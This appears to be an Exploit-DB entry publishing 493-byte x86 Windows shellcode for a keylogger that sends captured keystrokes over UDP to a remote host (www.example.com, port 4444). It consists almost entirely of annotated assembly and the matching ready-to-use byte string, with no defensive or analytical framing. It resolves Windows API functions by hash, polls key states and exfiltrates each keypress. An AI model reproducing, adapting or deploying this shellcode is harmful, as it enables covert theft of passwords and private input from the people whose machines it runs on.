Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)

EDB-ID:

40560

CVE:

N/A


Author:

Fugu


Platform:

Windows_x86

Date:

2016-10-17


; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes
; Date: Fri Oct 13 12:58:35 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all win
; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64)
; Note: it will write to single byte payload udp packets to host.
;       keystrokes are written in format: "Virtual-Key Codes", from 
;       msdn.microsoft.com website

section .bss

section .data

section .text
   global _start
      _start:
    cld										; 00000000 FC
    call dword loc_88h						; 00000001 E882000000
    pushad									; 00000006 60
    mov ebp,esp								; 00000007 89E5
    xor eax,eax								; 00000009 31C0
    mov edx,[fs:eax+0x30]					; 0000000B 648B5030
    mov edx,[edx+0xc]						; 0000000F 8B520C
    mov edx,[edx+0x14]						; 00000012 8B5214
loc_15h:
    mov esi,[edx+0x28]						; 00000015 8B7228
    movzx ecx,word [edx+0x26]				; 00000018 0FB74A26
    xor edi,edi								; 0000001C 31FF
loc_1eh:
    lodsb									; 0000001E AC
    cmp al,0x61								; 0000001F 3C61
    jl loc_25h								; 00000021 7C02
    sub al,0x20								; 00000023 2C20
loc_25h:
    ror edi,byte 0xd						; 00000025 C1CF0D
    add edi,eax								; 00000028 01C7
    loop loc_1eh							; 0000002A E2F2
    push edx								; 0000002C 52
    push edi								; 0000002D 57
    mov edx,[edx+0x10]						; 0000002E 8B5210
    mov ecx,[edx+0x3c]						; 00000031 8B4A3C
    mov ecx,[ecx+edx+0x78]					; 00000034 8B4C1178
    jecxz loc_82h							; 00000038 E348
    add ecx,edx								; 0000003A 01D1
    push ecx								; 0000003C 51
    mov ebx,[ecx+0x20]						; 0000003D 8B5920
    add ebx,edx								; 00000040 01D3
    mov ecx,[ecx+0x18]						; 00000042 8B4918
loc_45h:
    jecxz loc_81h							; 00000045 E33A
    dec ecx									; 00000047 49
    mov esi,[ebx+ecx*4]						; 00000048 8B348B
    add esi,edx								; 0000004B 01D6
    xor edi,edi								; 0000004D 31FF
loc_4fh:
    lodsb									; 0000004F AC
    ror edi,byte 0xd						; 00000050 C1CF0D
    add edi,eax								; 00000053 01C7
    cmp al,ah								; 00000055 38E0
    jnz loc_4fh								; 00000057 75F6
    add edi,[ebp-0x8]						; 00000059 037DF8
    cmp edi,[ebp+0x24]						; 0000005C 3B7D24
    jnz loc_45h								; 0000005F 75E4
    pop eax									; 00000061 58
    mov ebx,[eax+0x24]						; 00000062 8B5824
    add ebx,edx								; 00000065 01D3
    mov cx,[ebx+ecx*2]						; 00000067 668B0C4B
    mov ebx,[eax+0x1c]						; 0000006B 8B581C
    add ebx,edx								; 0000006E 01D3
    mov eax,[ebx+ecx*4]						; 00000070 8B048B
    add eax,edx								; 00000073 01D0
    mov [esp+0x24],eax						; 00000075 89442424
    pop ebx									; 00000079 5B
    pop ebx									; 0000007A 5B
    popad									; 0000007B 61
    pop ecx									; 0000007C 59
    pop edx									; 0000007D 5A
    push ecx								; 0000007E 51
    jmp eax									; 0000007F FFE0
loc_81h:
    pop edi									; 00000081 5F
loc_82h:
    pop edi									; 00000082 5F
    pop edx									; 00000083 5A
    mov edx,[edx]							; 00000084 8B12
    jmp short loc_15h						; 00000086 EB8D
loc_88h:
    pop ebp									; 00000088 5D
    push dword 0x3233						; 00000089 6833320000
    push dword 0x5f327377					; 0000008E 687773325F
    push esp								; 00000093 54
    push dword 0x726774c					; 00000094 684C772607
    call ebp								; 00000099 FFD5
    mov eax,0x190							; 0000009B B890010000
    sub esp,eax								; 000000A0 29C4
    push esp								; 000000A2 54
    push eax								; 000000A3 50
    push dword 0x6b8029						; 000000A4 6829806B00
    call ebp								; 000000A9 FFD5
    push byte +0x10							; 000000AB 6A10
    jmp dword loc_1ceh						; 000000AD E91C010000
loc_b2h:
    push dword 0x803428a9					; 000000B2 68A9283480
    call ebp								; 000000B7 FFD5
    lea esi,[eax+0x1c]						; 000000B9 8D701C
    xchg esi,esp							; 000000BC 87F4
    pop eax									; 000000BE 58
    xchg esp,esi							; 000000BF 87E6
    mov esi,eax								; 000000C1 89C6
    push dword 0x6c6c						; 000000C3 686C6C0000
    push dword 0x642e7472					; 000000C8 6872742E64
    push dword 0x6376736d					; 000000CD 686D737663
    push esp								; 000000D2 54
    push dword 0x726774c					; 000000D3 684C772607
    call ebp								; 000000D8 FFD5
    jmp dword loc_1e3h						; 000000DA E904010000
loc_dfh:
    push dword 0xd1ecd1f					; 000000DF 681FCD1E0D
    call ebp								; 000000E4 FFD5
    xchg ah,al								; 000000E6 86E0
    ror eax,byte 0x10						; 000000E8 C1C810
    inc eax									; 000000EB 40
    inc eax									; 000000EC 40
    push esi								; 000000ED 56
    push eax								; 000000EE 50
    mov esi,esp								; 000000EF 89E6
    xor eax,eax								; 000000F1 31C0
    push eax								; 000000F3 50
    push eax								; 000000F4 50
    push eax								; 000000F5 50
    push eax								; 000000F6 50
    inc eax									; 000000F7 40
    inc eax									; 000000F8 40
    push eax								; 000000F9 50
    push eax								; 000000FA 50
    push dword 0xe0df0fea					; 000000FB 68EA0FDFE0
    call ebp								; 00000100 FFD5
    mov edi,eax								; 00000102 89C7
loc_104h:
    push byte +0x10							; 00000104 6A10
    push esi								; 00000106 56
    push edi								; 00000107 57
    push dword 0x6174a599					; 00000108 6899A57461
    call ebp								; 0000010D FFD5
    test eax,eax							; 0000010F 85C0
    jz loc_122h								; 00000111 740F
    dec dword [esi+0x8]						; 00000113 FF4E08
    jnz loc_104h							; 00000116 75EC
    xor eax,eax								; 00000118 31C0
    push eax								; 0000011A 50
    push dword 0x56a2b5f0					; 0000011B 68F0B5A256
    call ebp								; 00000120 FFD5
loc_122h:
    push dword 0x3233						; 00000122 6833320000
    push dword 0x72657375					; 00000127 6875736572
    push esp								; 0000012C 54
    push dword 0x726774c					; 0000012D 684C772607
    call ebp								; 00000132 FFD5
    push dword 0x657461						; 00000134 6861746500
    push dword 0x74537965					; 00000139 6865795374
    push dword 0x4b746547					; 0000013E 684765744B
    push esp								; 00000143 54
    push eax								; 00000144 50
    push dword 0x7802f749					; 00000145 6849F70278
    call ebp								; 0000014A FFD5
    push esi								; 0000014C 56
    push edi								; 0000014D 57
    push eax								; 0000014E 50
    xor ecx,ecx								; 0000014F 31C9
    mov esi,ecx								; 00000151 89CE
    mov cl,0x8								; 00000153 B108
loc_155h:
    push esi								; 00000155 56
    loop loc_155h							; 00000156 E2FD
loc_158h:
    xor ecx,ecx								; 00000158 31C9
    xor esi,esi								; 0000015A 31F6
    push byte +0x8							; 0000015C 6A08
    push dword 0xe035f044					; 0000015E 6844F035E0
    call ebp								; 00000163 FFD5
loc_165h:
    mov eax,esi								; 00000165 89F0
    cmp al,0xff								; 00000167 3CFF
    jnc loc_158h							; 00000169 73ED
    inc esi									; 0000016B 46
    push esi								; 0000016C 56
    call dword [esp+0x24]					; 0000016D FF542424
    mov edx,esi								; 00000171 89F2
    xor ecx,ecx								; 00000173 31C9
    mov cl,0x80								; 00000175 B180
    and eax,ecx								; 00000177 21C8
    xor ecx,ecx								; 00000179 31C9
    cmp eax,ecx								; 0000017B 39C8
    jnz loc_18fh							; 0000017D 7510
    xor edx,edx								; 0000017F 31D2
    mov ecx,edx								; 00000181 89D1
    mov eax,esi								; 00000183 89F0
    mov cl,0x20								; 00000185 B120
    div ecx									; 00000187 F7F1
    btr [esp+eax*4],edx						; 00000189 0FB31484
    jmp short loc_165h						; 0000018D EBD6
loc_18fh:
    xor edx,edx								; 0000018F 31D2
    mov ecx,edx								; 00000191 89D1
    mov eax,esi								; 00000193 89F0
    mov cl,0x20								; 00000195 B120
    div ecx									; 00000197 F7F1
    bt [esp+eax*4],edx						; 00000199 0FA31484
    jc loc_165h								; 0000019D 72C6
    xor edx,edx								; 0000019F 31D2
    mov ecx,edx								; 000001A1 89D1
    mov eax,esi								; 000001A3 89F0
    mov cl,0x20								; 000001A5 B120
    div ecx									; 000001A7 F7F1
    bts [esp+eax*4],edx						; 000001A9 0FAB1484
    push esi								; 000001AD 56
    push byte +0x10							; 000001AE 6A10
    push dword [esp+0x30]					; 000001B0 FF742430
    push byte +0x0							; 000001B4 6A00
    push byte +0x1							; 000001B6 6A01
    lea ecx,[esp+0x10]						; 000001B8 8D4C2410
    push ecx								; 000001BC 51
    push dword [esp+0x3c]					; 000001BD FF74243C
    push dword 0xdf5c9d75					; 000001C1 68759D5CDF
    call ebp								; 000001C6 FFD5
    lea esp,[esp+0x4]						; 000001C8 8D642404
    jmp short loc_158h						; 000001CC EB8A
loc_1ceh:
    call dword loc_b2h						; 000001CE E8DFFEFFFF
    db "www.example.com",0
loc_1e3h:
    call dword loc_dfh
    db "4444",0

;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c"
;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20"
;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00"
;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01"
;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87"
;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73"
;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68"
;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89"
;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0"
;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56"
;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77"
;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47"
;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31"
;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44"
;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24"
;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10"
;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24"
;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf"
;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63"
;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"